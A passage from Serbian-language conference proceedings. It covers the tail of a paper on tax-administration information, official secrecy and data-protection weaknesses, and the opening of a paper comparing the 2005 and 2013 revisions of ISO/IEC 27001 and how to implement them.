kontrole;



50

− Rešenja doneta u prekršajnom postupku; − Žalbe izjavljene protiv rešenja o prekršaju; − Drugostepena rešenja doneta povodom žalbi izjavljenih protiv rešenja o prekršaju; − Rešenja o oduzimanju robe; − Rešenja o izricanju mere zabrane vršenja delatnosti; − Izveštaji kancelarijske i terenske kontrole podneti Poreskoj policiji; − Podnete krivične prijave; − Ustanovljene mere obezbeđenja naplate; − Izveštaji banaka o podizanju gotovine sa računa poreskog obveznika iznad

propisanog iznosa; − Dokazi o nabavljenim količinama kontrolnih akciznih markica od strane proi-

zvođača, odnosno uvoznih akciznih proizvoda; − Sve ostale potrebne informacije o poreskom obvezniku i njegovom poslovanju. Iz napred navedenih podataka mogu se saznati podaci o načinu poslovanja pri-

vrednog subjekta, organizaciji, poslovnim partnerima, politici investiranja, politici cena, uslovima nabavke i prodaje robe, odnosno pružanja usluga i čitav niz poslovnih informacija koje predstavljaju tajnu poreskog obveznika i obezbeđuju mu pogodnosi ili konkurensku prednost na tržištu.

2. Informacije od javnog značaja

Veliki broj informacija koje se tiču organa uprave i poreskih obveznika dostupan je zainteresovanima. Do informacija se može doći preko sajta Poreske uprave, pozivanjem ili putem elektronske pošte sa Kontakt centrom i u direktnom – ličnom kontaktu sa zaposlenima u poreskoj administraciji. Postupak za pristup informacijama od javnog značaja propisan je Zakonom o slobodnom pristupu informacijama od javnog značaja i drugim aktima donetim u poreskoj upravi koji definišu obim korišćenja i pružanja informacija, lica koja mogu tražiti i pružiti informaciju iz određenog delokruga rada poreske administracije i podataka kojima raspolaže. Zahtev za pristup informacijama od javnog značaja podnosi se u skladu sa članom 15. Zakona.

Informacije kojima Poreska uprava omogućava uvid su: − Mišljenja Ministarstva finansija koja se objavljuju u “Biltenu službenih

objašnjenja i stručnih mišljenja”; − Podaci o ostvarenim poreskim prihodima koji se objavljuju u “Biltenu javnih

finansija”; − Sudske odluke; − Saopštenja Poreske uprave koja se u elektronskoj formi mogu preuzeti na adresi:

www.purs.gov.rs; − Izveštaji o radu Poreske uprave; − Poreski propisi, podzakonska akta i obrasci poreskih prijava; − Korisnička upustva za primenu poreskih propisa.



51

− Poslednjeg dana u poslednjem mesecu kvartala obaveštenja o iznosu poreskog duga poreskih obveznika koja se objavljuju na wеb sajtu Poreske uprave.

Informacije koje nisu dostupne tražiocima van poreske administracije i licima iz uprave koja nemaju potrebu za tom vrstom informacija u cilju obavljanja redovnih radnih zadataka na mestima na koja su raspoređeni tiču se ličnih podataka o zaposlenima i poreskim obveznicima i podacima poreskih obveznika regulisanih članom 7. Zakona o poreskom postupku i poreskoj administraciji.

3. Poreski postupak i poreska administracija

Poreski postupak se primenjuje u svim radnjama koje u okviru svojih ovlašćenja preduzima poreska administracija. U Srbiji poslovi utvrđivanja i naplate javnih prihoda i kontrole poštovanja poreskih propisa obavljaju se na 4 nivoa i to:

− Republičkom, − Pokrajinskom, − Gradskom i − Opštinskom.

Na republičkom nivou administriraju se najizdašniji poreski oblici kao što su porez na dodatu vrednost, porez na dohodak građana, porez na dobit pravnih lica, akcize, ali i neki manje značajni porezi koji nemaju velikog učešća u prihodima budžeta Republike, već su uvedeni iz socijalnih i drugih razloga. Poreski postupak se obavlja i kod menjačkih i deviznih poslova i u realizaciji igara na sreću. Fiskalnom decentralizacijom administriranje nekih poreskih oblika, kao što je porez na imovinu u statici, prešlo je u nadležnost lokalne poreske administracije.

3.1. Organizacija i način rada

Prema Zakonu o poreskom postupku i poreskoj administraciji Poreska uprava ima sledeće nadležnosti:

• 1) vrši registraciju poreskih obveznika dodeljivanjem PIB i vodi jedinstven registar poreskih obveznika;

• 2) vrši utvrđivanje poreza u skladu sa zakonom; • 3) vrši poresku kontrolu u skladu sa zakonom; • 4) vrši redovnu i prinudnu naplatu poreza i sporednih poreskih davanja; • 5) otkriva poreska krivična dela i njihove izvršioce i u vezi sa tim preduzima za-

konom propisane mere; • 6) pokreće i vodi prvostepeni i drugostepeni prekršajni postupak i izriče kazne i

zaštitne mere za poreske prekršaje; • 7) odlučuje o žalbama izjavljenim protiv rešenja donetih u poreskom postupku; • 8) stara se o primeni međunarodnih ugovora o izbegavanju dvostrukog oporezivanja; • 9) razvija jedinstveni poreski informacioni sistem; • 10) vodi poresko knjigovodstvo;



52

• 11) planira i sprovodi obuku zaposlenih; • 12) pruža stručnu pomoć poreskim obveznicima u primeni poreskih propisa, u

skladu sa kodeksom ponašanja zaposlenih u Poreskoj upravi; • 13) obezbeđuje javnost u radu; • 14) obavlja druge poslove u skladu sa zakonom. Sve promene koje se dešavaju u poslovanju poreskih obveznika, a tiču se njihove

poreske situacije, knjiže se u Poreskoj upravi. Evidencija je dostupna svim poreskim inspekto- rima. Sistem poreske uprave zasniva se na distribuiranom unosu svih vrsta prijava i njihovoj centralizovanoj obradi. Pošto svaka filijala ima svoju lokalnu bazu podataka, redovna razmena podataka filijala sa centralnom bazom podataka podrtazumeva komunikaciju u oba smera10.

Funkcionisanje organizacionog sistema je u neposrednoj vezi i zavisi od organizacio- ne strukture. Slabosti u organizovanju i načinu rada Poreske uprave imaju kao posledicu probleme u državi. Zbog toga su poreske administracije u svakoj zemlji prve izložene promena ma, reformama, modernizaciji i restruktuiranju. Preko organizacije rada i sredstava dolazi se do željenog cilja. Rad, sredstva i organizacina struktura su kroz funkcionisanje u stalnom me- đusobnom uticaju i reverzibilnom dejstvu. Najbolja organizaciona forma bez adekvatnih procesa rada ne donosi uspeh, kao što ni najbolji rad u rđavoj organizaciji ne može biti posebno uspešan. Ma koliko jedna organizaciona forma bila uspešna u jednom periodu, ona ne podrazumeva nepromenljivost. Sa promenama u okruženju, ciljevima, odnosima, sistemom, neo-phodno je menjati i organizaciju sistema. Sastavljajući organizacionu strukturu trebalo bi stalno imati na umu njeno funkcionisanje, posebno u izvršilačkim funkcijama, jer kao što je pogubno biti efikasan na pogrešno postavljenim ciljevima, tako i najbolja organizacija, ciljevi i planovi ostaju bez rezultata ako su izvršioci neobučeni i neefikasni. Bez dobre organizacije rada produktivnost je manja, a troškovi veći. U takvim uslovima zaposleni u poreskoj upravi svesno usporavaju i usložnjavaju svoj rad stvarajući privid sopstvenog značaja i neopho- dnosti. Na taj načun pada produktivnost i ekonomičnost svesnim ograničavanjem učinaka (doneta rešenja, izvršene kontrole, izbor subjekata za kontrolu, prinudna naplata, rešene žalbe itd.). Nedovoljna motivacija kod zaposlenih se na svim nivoima i radnim mestima prevazilazi ostvarivanjem prihoda na način suprotan zakonu, a pozicija čuva pripadnošću neformalnim i formalnim interesnim grupama.

Veći radni učinak može se postići: − Boljom organizacijom u kojoj se funkcije kontrolišu uzajamno, − Boljim korišćenjem radnog vremena i − Eliminisanjem ostvarivanja prihoda van poreske administracije od poreskih

obveznika bez obzira da li oni potiču iz pruženih usluga van rada ili korišćenjem pogodnosti koje proističu iz radnog mesta na kome se zaposleni nalazi u poreskoj administraciji.

Bitno je da u službi rade posvećeni i motivisani službenici koji svojim radom neće dovesti do narastanja birokratije i formalizovanja metoda rada.

Organizacija izvršne funkcije koja nije dinamička, koja se ne razvija i ne podiže na viši nivo, koja stagnira, postepeno zaostaje i po zakonu entropije prelazi u dezorganizaciju kao svoju negaciju. Otuda se u funkcionisanju izvršne funkcije javlja princip stimulacije kao neophodan princip motivacije zaposlenih na razvijanju njihovih inicijativa.

10 Vidojević dr Dejan:E-porezi-poreski informacioni sistem, Plato, Beograd, 2013.god.



53

Oprema za rad u poreskoj upravi mora biti funkcionalna, da olakšava rad, a ne da ga komplikuje. Prelaskom na nove tehnologije vođenja knjigovodstva i podnošenja elektronskih prijava poreskoj upravi načinjen je značajan korak u ovom pravcu. Korak koji sledi je povezivanje i prenos podataka sa drugim državnim organima. Razmena i obrada informacija se tako znatno ubrzava. Tehnološkim napretkom sistema koristi imaju i poreskli obveznici, jer im se u saradnji sa poreskom upravom uprošćavaju i olakšavaju mnoge funkcije. Međutim, veća dostupnost informacijama o poreskim obveznicima nosi uvećanu opasnost zloupotrebe.

3.2. Dostupnost datotekama koje se vode u poreskim administracijama

Veliki broj podataka, dva operativna sistema koja uporedo funkcionišu, mogućnost pristupa informacijama i njihoj promeni, slaba informatička pismenost zaposlenih i nedovoljna kontrola lica koja pristupaju informacijama i menjaju ih može rezultirati štetama po budžet i poreskim obveznicima. Na sistemu DIS 2003 vode se podaci kojima je obuhvaćeno oko 93% utvrđenih javnih prihoda. Na starom IMP sistemu vode se podaci kojima je obuhvaćeno ostalih 7% prihoda. Sistem zaštite bi trebalo da bude takav da ne omogućava zloupotrebu pristupu informacijama. Sistem bi trebalo da deluje preventivno, a ne kada je do štete već došlo. Ne tako davno bili smo svedoci da su lica na visokim pozicijama u Ministarstvu finansija i neka druga lica van poreske uprave ostvarila slobodan pristup važnim informacijama o poreskim obveznicima i iste preuzeli iz poreskih datoteka. Mnogo manja šteta, ali ne zanemarljiva po budžet nanosi se, neosnovanim i bez dokumentacije, otpisom poreskog duga.

3.3. Čuvanje službene tajne u poreskom postupku

Zbog značaja informacija kojima raspolaže poreska adminisracija Zakonom o poreskom postupku propisana je obaveza čuvanja informacija kao službena tajna. Zakonom su službena lica i sva druga lica koja učestvuju u poreskom postupku dužna da, kao službenu tajnu, čuvaju: svaki dokument, informaciju, podatak ili drugu činjenicu o poreskom obvezniku, do koje su došla u poreskom, prekršajnom ili sudskom postupku; podatke o tehničkim pronalascima ili patentima, kao i sve druge podatke o tehnološkim postupcima koje primenjuje poreski obveznik, do kojih su došli u poreskom postupku. Ova obaveza važi i nakon prestanka radnog odnosa. Obaveza čuvanja službene tajne je povređena ako se dokumenti, činjenice, odnosno podaci iz stava 1. ovog člana neovlašćeno koriste ili objave. Ovo iz razloga što povreda službene tajne ugrožava javni interes i interes poreskog obveznika.

4. Prelazak sa papirnog na elektronsko poslovanje

Reforma i modernizacija poreske administracije najvidljivija je u primeni informacionih tehnologija i prelasku sa lične i papirne na elektronsku komunikaciju između poreskih obveznika i poreskih administracija. Razvijeni korisnički servisi omogućavaju efikasniju komunikaciju koja se sa šaltera seli u bezličnu sferu – elektronsku komunikaciju. Ovime se ostvaruje kvalitetniji odnos između poreskih obveznika i poreske uprave, lakše se podnose, obrađuju i evidentiraju poreske prijave i ostvaruje uvid u poresku situaciju poreskog obveznika.

Prilikom pristupa internet strani poreske uprave obavezna je identifikacija korisnika koja mu daje ovlašćenja za rad u aplikaciji. Identifikacija korisnika vrši se unosom korisničkog imena i lozinke u za to predviđena polja. Uspešnom autorizacijom omogućava se pristup servisima.



54

U razmeni podataka dešavaju se greške u smislu gubitka određene analitike ili du- plog knjiženja. Detekcija problema i eventualnih propusta u razmeni podataka u potpunosti se oslanja na naknadne intervencije od strane poreskih obveznika i poreskih službenika.

U Poreskoj upravi svi podaci do kojih se došlo u poreskom i poreskoprekršajnom postupku čuvaju se u papirnoj formi u arhivi pisarnice, kod službenih lica koja rade na pre- dmetima i u elektronskom obliku u računarima, CD-ovima i dr. Svi podaci čuvaju se na Orakl serverima u centrali Poreske uprave, konfigurisanim da rade u klaster režimu čime se postiže bezbednost sistema. Delimične kopije informacija čuvaju se u bazama organizacionih jedinica na 170 lokacija i na preko 7.000 radnih stanica na Interbase-u.

5. Zaštita podataka i prenosa podataka

DIS (distribuirani informacioni sistem) aplikacija je dizajnirana kao centralizovana baza podataka koja informacije dobija od baza podataka u svim filijalama poreske uprave. Sve razmene podataka obavljaju se bez šifrovanja upotrebom HTTP i FTP servisa. Na centralnoj lokaciji informacije se obrađuju i skladište u centralnu bazu podataka. Podaci se prenose u vidu komprimovanih tekst datoteka u nešifrovanom obliku. Određena zaštita se sprovodi tako što se prenos podataka vrši u unapred definisanim periodima i u mogućnosti da se izda neka naredba serveru u filijali, npr. naredba za formiranje backup-a.

Način arhiviranja i pravljenja kopija podataka su deo sigurnosnog mehanizma. Ko- pije se formiraju na medijumima sa stalnim zapisom i čuvaju se na filijali i u centrali. Ovako formirana arhiva omogućava ažuriranje izgubljenih podataka i mogućnost poređenja autentičnosti arhiviranih i operativnih podataka.

Mogućnost izmene i brisanja podataka ustanovljava se sistemom privilegija. U slučaju baza podataka na Oracle platformi postoje gotova rešenja koja omogućavaju definisanje kontrole pristupa podacima sa naredbom: select, insert, update ili delate. Praćenje aktivnosti korisnika na bazi podataka je veoma bitan aspekt zaštite podataka u bazi i obezbeđuje odgovornost korisnika za njegove akcije. Na ovaj način mogu se otkriti neautorizovane akcije korisnika i sprečiti zloupotreba od strane korisnika sa visokim nivoom privilegija.

Zaključak

Stepen centralizacije, odnosno decentralizacije je od velikog značaja u administri- ranju. Poslovi obrade prijava, utvrđivanja poreskih obaveza, naplate i kontrole trebaju biti efi- kasni i ekonomični i iz tog razloga moraju se približiti poreskim obveznicima. Bezlična komunikacija, bez ličnog kontakta smanjuje mogućnost korupcije i sigurnija je ako je broj jedinica u kojima se obavljaju poslovi poreske administracije manji. Slabost DIS 2003 je nepostojanje i/ili nesprovođenje sigurnosne politike, kao što je npr. loša primena sistema autentifikacije korisnika. Ovaj propust bitno umanjuje mogućnost odbrane od unutrašnjih pretnji.

Podnošenjem poreskih prijava elektronskim putem, postupak se čini efikasnijim i ekonomičnijim, mogućnost greške se smanjuje, jer sistem proverava logičnost podataka, gre- ška poreskog službenika prilikom unosa ne postoji. Međutim, ovakvim radom bezbednost i povrljivost podataka može biti ugrožena. Zbog toga pre pristupa elektronskoj komunikaciji, u smislu podnošenja poreskih prijava neophodna je prethodna registracija pri kojoj se dodeljuje jedinstven ključ za identifikaciju (elektronski potpis, verifikacija elektronskog potpisa, veri- fikator, podaci i sredstva za verifikaciju elektronskog potpisa), korisničko ime i lozinka.

55

IMPLEMENTACIJA ISO/IEC 27001 PREMA REVIZIJI 2013

IMPLEMENTATION OF ISO / IEC 27001 ACCORDING TO THE REVISION 2013

Dr.sc. Zdenko Adelsberger11

Rezime: U ovom radu predstavljeni je postupak implementacije sistema upravljanja informacijskom sigurnošću (ISMS) prema novoj reviziji standarda ISO/IEC 27001:2013. Potpuno nova struktura standarda, temeljena na Aneksu SL iz 2012 godine uveo je niz noviteta kako u postupak implementacije sistema upravljanja, tako i u interne provjere. U radu se daje kritički osvrt i usporedba implementacije sa starom revizijom standarda jer iskustva se mogu direktno primijeniti i za implementacije novih revizija ISO 9001 i ISO 14001, čije se objavljivanje očekuje tokom 2015 godine. Posebno se komentira i prikazuje mogućnost integracije sistema upravljanja čija se implementacija temelji na standardima koji su napravljani prema aneksu SL.

Ključne riječi: isms, 27001, annex sl, implementacija

Abstract: In this paper, described the process of implementation of the Information Security Management System (ISMS) according to the new revision of ISO/IEC 27001:2013. Completely new structure standards, based on Annex SL from 2012 introduced a number of innovations to the process of implementation of management systems, as well as in internal checks. The paper provides a critical review and comparison with the old standards because experience can be directly applied to the implementation of the new revision of ISO 9001 and ISO 14001, expected for release during 2015. Especially commented possibility of integration management system whose implementation based on standards that have been created by the Annex SL.

Key words: isms, 27001, annex SL, implementation

11 Dr.sc. Zdenko Adelsberger, Bluefield d.o.o., Zagreb, HR, mail: [email protected]

Implementacija ISO/IEC 27001 prema reviziji 2013 Zbornik radova Zdenko Adelberger

56

1. UVOD

Implementacija bilo kojeg sistema upravljanja prema zahtjevima ISO standarda uvijek predstavlja ozbiljan projekt u organizaciji. Ozbiljnost implementacija značajno raste sa potrebama i željama uprave da od implementiranog sistema upravljanja imaju i objektivne koristi, a ne samo eventualno pravo učešća na nekom tenderu. Za svaki sistem upravljanja može se navoditi niz razloga zašto ga implementirati, ali bez obzira na područje djelovanja bilo kojeg sistema upravljanja, uvijek je jedan od razloga implementacije prisuta: učešće implementiranog sistema upravljanja u stvaranju viška vrijednosti za kompaniju. Ponekad je teško dokazati kako i koliko neki sistem upravljanja učestvuje u stvaranju viška vrijednosti, ali je isto tako teško, odnosno nemoguće dokazati da ne učestvuje.

Komplikacije unutar kompanije pri implementaciji sistema upravljanja nastaju i zbog toga što u pravilu treba implementirati više od jednog sistema upravljanja prema formalnim specifikacijama zahtjeva ISO standarda. S jedne strane ni jedan takav sistem upravljanja ne može raditi unutar kompanije potpuno samostalno, bez interaktivnog utjecaja prema drugim sistemima upravljanja, kao što drugi sistemi upravljanja utječu na njega. To dovodi do či- njenice da treba u fazi donošenja odluke o implementaciji nekog sistema upravljanja voditi ra- čuna i o integraciji novog sistema s ostalim, već postojećim. U kontekstu ISO standarda do 2012 godine formalno nije postojao princip integracije sistema upravljanja, mada je bilo odre- đenih rješenja u drugim prostorima važenja nekih standarda (npr. BSI PAS 99 za područje zemalja komonvelta). 2012 godine ISO je publicirao Annex SL koji definira strukturu i pristup pisanju standarda koji predstavljaju specifikacije zahtjeva za implementaciju nekog sistema upravljanja. Prema tom Annex SL svi standardi koji su specifikacija zahtjeva u budućnosti moraju imati potpuno istu strukturu. Pored toga, usvojen je jedan princip, koji apsolutno odgovara realnoj situaciji: svi sistemi upravljanja imaju niz zahtjeva potpuno jednake, a neki zahtjevi se razlikuju odo jednog do drugog sistema upravljanja, ovisno od područja i namjene djelovanja. U tom smislu, zajednički zahtjevi, koji su isti za sve sisteme upravljanja su tekstualno potpuno jednaki u svim novim revizijama poslije 2012 godine, a samo u okviru poglavlja 8 novih standarda se obrađuju specifičnosti pojedinog sistema upravljanja.

Jedan od prvih standarda koje je specifikacija zahtjeva u skladu s Annex-om SL objavljen je 2013 godine za sisteme upravljanja informacijskom sigurnošću (ISMS). To je ISO/IEC 27001:2013. Prethodna revizija tog standarda je bila iz 2005 godine.

U okviru ovog rada se kritički osvrće na značajke implementacije ISMS-a prema novoj reviziji sukladnoj Annex-u SL u usporedbi sa starom revizijom. Rad je rezultat iskustva implementacije niza ISMS-a prema reviziji iz 2005 godine i iskustva implementacije prema reviziji iz 2013 godine. Pored toga, u radu se provodi analiza novog pristupa samo za podru- čje ISMS, odnosno ISO/IEC 27001, i ne referira se na druge standarde, mada se praktički svi zaključci mogu gotovo u cijelosti primijeniti i za druge sisteme upravljanja.

2. USPOREDBA ISO/IEC 27001 IZ 2013 I 2005 GODINE

Prvi pregled i usporedba standarda ISO/IEC 27001 iz 2005 i iz 2013 godine pokazuje da je nova revizija potpuno drugačija. Sadržaj revizije iz ISO/IEC 27001:2013 je:


57

ISO/IEC 27001:2013 - Sadržaj ISO/IEC 27001:2005 - Sadržaj

Predgovor 0 Uvod 1 Opseg 2 Normativne reference 3 Pojmovi i definicije 4 Kontekst organizacije 4.1 Razumijevanje organizacije i njenog konteksta 4.2 Razumijevanje potreba i očekivanja zainteresiranih strana 4.3 Određivanje opsega sustava za upravljanje informacijskom sigurnošću 4.4 Sustav za upravljanje informacijskom sigurnošću 5 Rukovođenje 5.1 Rukovođenje i predanost 5.2 Politika 5.3 Organizacijske uloge, odgovornosti i ovlasti 6 Planiranje 6.1 Akcije za rješavanje rizika i prilika 6.2 Ciljevi informacijske sigurnosti i planiranje za njihovo ostvarivanje 7 Podrška 7.1 Resursi 7.2 Kompetencije 7.3 Svjesnost 7.4 Komunikacija 7.5 Dokumentirane informacije 8 Operacije 8.1 Operativno planiranje i kontrola 8.2 Procjena rizika informacijske sigurnosti 8.3 Obrada rizika informacijske sigurnosti 9 Ocjenjivanje uspješnosti 9.1 Nadzor, mjerenje, analiza i ocjena 9.2 Unutarnji audit 9.3 Upravina ocjena 10 Poboljšanje 10.1 Nesukladnost i korektivne akcije 10.2 Kontinuirano poboljšanje Aneks A (normativni) Referenca ciljeva kontrola i kontrola Bibliografija

Predgovor 0 Uvod 0.1 Općenito 0.2 Procesni pristup 0.3 Kompatibilnost sa ostalim sustavima upravljanja 1 Predmet 1.1 Općenito 1.2 Primjena 2 Normativne reference 3 Nazivi i definicije 4 Sustav upravljanja informacijskom sigurnošću 4.1 Opći zahtjevi 4.2 Uspostavljanje i upravljanje ISMS-om 4.2.1 Uspostaviti ISMS 4.2.2 Implementirati i izvršavati ISMS 4.2.3 Nadzirati i provjeravati ISMS 4.2.4 Održavati i poboljšavati ISMS 4.3 Zahtjevi za dokumentaciju 4.3.1 Općenito 4.3.2 Kontrola dokumenata 4.3.3 Kontrola zapisa 5 Odgovornost uprave 5.1 Opredjeljenje uprave 5.2 Upravljanje sredstvima 5.2.1 Dodjeljivanje sredstava 5.2.2 Obučavanje, razina svijesti i sposobnosti 6 Interne prosudbe (auditi) ISMS-a 7 Provjera ISMS-a od strane uprave 7.1 Općenito 7.2 Ulazni podaci za provjeru 7.3 Rezultati provjere 8 Poboljšanje ISMS-a 8.1 Stalno poboljšanje 8.2 Korektivna akcija 8.3 Preventivna akcija Aneks A: Ciljevi kontrola i kontrole Aneks B: OECD principi i ova međunar. norma Aneks C: Podudarnosti između ISO 9001:2000, ISO 14001:2004 i ove međunarodne norme Bibliografija


58

Razlike su evidentno u strukturi ogromne, odnosno toliko velike da se na nivou sadrža- ja teško mili nikako mogu uspoređivati međusobno. Stvar se mijenja kada se pogleda sadržaj.

Generalno govoreći ova promjena donijela je niz prednosti, ali i ima i neke nedostatke. Ključni nedostatak nove revizije ISO/IEC 27001:2013 u odnosu na ISO/IEC 27001:2005 je u tome što je prethodna revizija imala eksplicitno definirane aktivnosti koje se provode unutar PDCA kruga procesa upravljanja informacijskom sigurnošću. U novoj reviziji to nije tako navedeno, što može posebno kod nedovoljno iskusnih implementatora ISMS-a izazvati nedoumice, kako stvarno provesti implementaciju. Ostale novosti koje donosi nova revizija i/ili isključenje nekih stvari iz stare revizije, osobno smatram značajnim napretkom, a ne nedostatkom. U svakom slučaju, moguće je primijeniti slijedeću shemu implementacije kroz PDCA krug prikazan na slici 1:

Slika 1: PDCA krug procesa ISMS

Koraci u pojedinim fazama implementacije PDCA kruga za ISMS sadržavaju slijedeće: PLAN: Uspostaviti ISMS politiku, ciljeve, procese i procedure važne za upravljanje

rizikom i poboljšanje informacijske sigurnosti kako bi dali rezultate u skladu s ukupnom politikom i ciljevima organizacije.

DO: Implementirati i izvršavati ISMS politiku, kontrole, procese i procedure. CHECK: Procijeniti i gdje je primjenjivo, mjeriti izvršavanje procesa u odnosu na

ISMS politiku, ciljeve i praktično iskustvo te izvještavati upravu o rezultatima radi provjere. ACT: Poduzeti korektivne i preventivne akcije zasnivane na rezultatima interne

ISMS prosudbe (audita) i provjere uprave ili ostalim bitnim informacijama, kako bi se postiglo stalno poboljšanje ISMS-a.

3. ZNAČAJKE IMPLEMENTACIJE ISMS-a PREMA ISO/IEC 27001:2013

Kada se govori o implementacije ISMS-a, za razliku od ostali sistema upravljanja postoji veliki broj dodatnih smjernica kojima se pomaže i upućuje kako određene dijelove sistema implementirati. Posebno su interesantni slijedeći standardi – smjernice:


59

• a) ISO/IEC 27002:2013 Code of practice for information security management – potpuno je harmoniziran sa Anexom A iz nove revizije ISO/IEC 27001:2013. Stara revizija ove smjernice više se ne treba koristiti.

• b) ISO/IEC 27003:2010 Information security management system implementation guidance – dijelom se može koristiti, jer je u potpunosti usklađena sa starom revizijom, ali ima niz detaljnih i korisnih uputa za implementaciju, naročito za zahtjeve koji su ostali iz stare u novoj reviziji.

• c) ISO/IEC 27004:2009 Information security management – Measurement – u potpunosti se može primijeniti i preporuka je da se koristi jer se odnosi na pitanja mjerenja učinkovitosti procesa ISMS-a i primijenjenih kontrola.

• d) ISO/IEC 27005:2008 Information security risk management – smjernica koja je opisivala upravljanje rizicima za potrebe ISMS-a. Nova revizija ISO/IEC 27001:2013 se ne referencira više na ISO/IEC 27005, već na ISO 31000 po pitanjima upravljanja rizicima. To znači da je ta smjernica praktički više nepotrebna, mada u njoj ima niz priloga u kojima se daju praktični savjeti vezani za klasifikaciju informacijske imovine, kao i nekih drugih tema.

Ostale smjernice iz serije ISO 27k n e treba tu nabrajati jer sve i dalje jednako vrijede i ovisno od područja implementacije ISMS-a ili aktualnih tema implementacije trebalo bi ih koristiti.

Kada se govori o novoj reviziji ISO/IEC 27001 temeljnoj na Annex-u SL treba primijetiti da je jedna od značajnih promjena odnos prema dokumentaciji. Tu i dalje ostaje obveza procesnog pristupa, ali se dozvoljava veća sloboda korisnicima ISMS-a da samo odluče koje procedure će opisivati a koje neće. Neki dokumenti su eksplicitno u zahtjevima navedeni da se moraju napraviti, a neki više nisu. To smatram da je dobrim pristupom, jer u manjim kompanijama se konačno i formalno dozvoljava primjereno dimenzioniranje dokumentacije i odnosu na velike kompanije koje će i dalje vjerojatno znatno detaljnije dokumentirati svoj ISMS.

Značajna terminološka promjena je i u tome da se više ne spominje dokumentacija, već dokumentirana informacija. Osobno ne smatram to kao neki problem, jer u kontekstu informacijskog sistema to odgovara, ali i za druge sisteme upravljanja ne bi trebao biti problem, osim navika korisnika.

Analizom zahtjeva u standardu i traženjem koje su to dokumentirane informacije obvezne, može se utvrditi da su to slijedeće:

• a) Opseg ISMS-a (4.3) • b) Politika informacijske sigurnosti (5.2) • c) Procedura za procjenu informacijskih rizika (6.1.2) • d) Procedura za obradu rizika (6.1.3) • e) Izjava o primjenljivosti (6.1.3 d) • f) Ciljevi informacijske sigurnosti (6.2) • g) Evidencija kompetencija (7.2 d) • h) Dokumentirane informacije definirane od kompanije za ostvarenje učinkovi-

tosti ISMS-a (7.5.1 b) • i) Operativno planiranje i kontrole (8.1) • j) Rezultati procjene informacijskih rizika (8.2)


60

• k) Rezultati obrade informacijskih rizika (8.3) • l) Zapisi nadzora i rezultata mjerenja (9.1) • m) Zapisi o audit programima i rezultatima audita (9.2 g) • n) Zapisi o upravinoj ocjeni (9.3) • o) Zapisi o prirodi nesukladnosti i svim poduzetim akcijama (10.1 f) • p) Zapisi o korektivnim akcijama (10.1 g). U principu se dokumentirane informacije mogu nalaziti u štampanoj formi, mada se

očekuje da budu u elektronskom obliku. Koliko god da se dozvoljava određena sloboda u smislu dokumentiranja ISMS-a,

dvije stvari nisu u domeni slobodnog izbora. To su obavezna procjena rizika za sve polovne procese i utjecaj na njihovo ostvarenje ciljeva, te dokumentiranje mjerenja učinkovitosti procesa. To znači, ne mora se dokumentirati procedura npr. za interni audit, ali se za taj proces mora raditi i dokumentirati procjena rizika i dokumentirati mjerenje učinkovitosti.

Radeći na nizu implementacija ISMS-a prema reviziji iz 2005 godine razvijena je niz predložaka za dokumentiranje sistema upravljanja. Objavljivanjem nove revizije 2013 godine i kritičnim uspoređivanjem zahtjeva iz nje i stare dokumentacije, najjednostavnije je bilo razviti potpuno novi set dokumenta koji mogu služiti kao predlošci. Posebno zato što dokumenti koji se odnose na zahtjeve poglavlja 4-7, te 9-10 standarda ISO/IEC 27001:2013. Naime, dokumente za te zahtjeve treba napraviti tako da odgovaraju za sve sisteme upravljanja koji budu ili jesu svoje specifikacije zahtjeva definirali prema Annex-u SL. Razlog za to je u činjenici da svi standardi temeljeni na Annex-u SL imati ta poglavlja potpuno jednaka (isti tekst, isti zahtjevi).

Temeljem te činjenice može se reći da svaki tako implementirani sistem upravljanja u sebi sadrži imanentno integraciju sa ostalim sistemima upravljanja. Naime, svi zajednički dokumentirani zahtjevi (poglavlja 4-7, 9-10) kada se napravi u okviru jednog sistema upravljanja automatski vrijede i za sve ostale. Time se ostvaruje ne samo integracija, već i dramatično smanjenje aktivnosti implementacije drugog, trećeg i daljnjih sistema upravljanja.

Prema reviziji iz 2005 godine za ISMS Poslovnik (ili priručnik) nije bio definiran kao zahtjev i auditori ga nisu niti zahtijevaju. Osobno smatram da je dobro imati Poslovnik koji je bio obvezan npr. za sisteme upravljanja kvalitetom prema ISO 9001. Kada se u ostale standarde koji su specifikacija zahtjeva primjeni princip Annex-a SL, i kod njih neće Poslo- vnik više biti obvezan. Radeći kao konzultant i dalje bi zagovarao Poslovnik, i ne vidim problem što više nije zahtjev.

Ono što je značajno za ISO/IEC 27001:2013 više se ne poziva na ISO 9001 kao temeljni standard već na ISO 31000. To će važiti i za sve ostale ISO standarde - specifikacije, jer prema Annex-u SL stvaranje proaktivnog okruženja je nužan zahtjev za prihvatljivo funkcionira sistema upravljanja. Takvo proaktivno okruženje se može postići jedino procjenom, odnosno upravljanjem rizicima. U tom smislu će naročito biti značajne promjene posebno za ISO 9001 čija se nova revizija očekuje 2015 godine.

Jedna od teškoća implementacije ISMS-a prema novoj reviziji ostaje kao što je bilo i u prethodnoj. Naime, nova revizija ne govori o tome da li mora netko biti član uprave, odnosno predstavnik ISMS-a u upravi. Prema poglavlju 5 standarda ostaje na tome da kompanija sama tokom implementacije definira organizaciju i vezu između uprave i ISMS-a. Objektivno to je jedna od ozbiljnih teškoća implementacije ISMS-a jer netko mora preuzeti funkciju veze ISMS-a i uprave. Ta osoba bi trebala biti visoko pozicionirana što obično nije lako postići, kako u malim, tako i u velikim kompanija, mada razlozi nisu isti, ponekad ni slični. Kada se u nekoj ko-


61

mpaniji uvede više sistema upravljanja, sigurno da bi svi sistemi trebali na neki način biti za- stupljeni u upravi. Formalno to se neće događati, jer postojeće uprave se neće zbog toga proširi- vati, a postojeći članovi vjerojatno neće ili vrlo teško prihvaćati nove obveze i odgovornosti.

Implementacija ISMS-a ima za razliku od drugih sistema upravljanja i obaveznu provedbu kontrola definiranih u Annex-u A standarda ISO/IEC 27001. To je bilo isto u prethodnoj verziji, međutim aktualna revizija je drugačije grupirala kontrole u 14 sigurnosnih područja sa 35 sigurnosnih ciljeva i 114 kontrola. Tu je došlo do praktičnog i opravdanog čišćenja kontrola na temelju višegodišnje iskustva i nova struktura Annex-a A je racionalnija i bolje organizirana, što olakšava implementaciju.

4. Projekt implementacije ISMS-a prema ISO/IEC 27001:2013

Praktična implementacija ISMS-a u kompaniju prema zahtjevima u ISO/IEC 27001:2013 provodi se kroz niz koraka. Ti se koraci mogu prikazati kroz slijedeću tablicu:

KORAK OPIS ZAHTJEV IZLAZNI DOKUMENT

1 Definicija područja i obuhvata ISMS

4.3 Opseg ISMS

2 Definicija sigurnosne politike ISMS

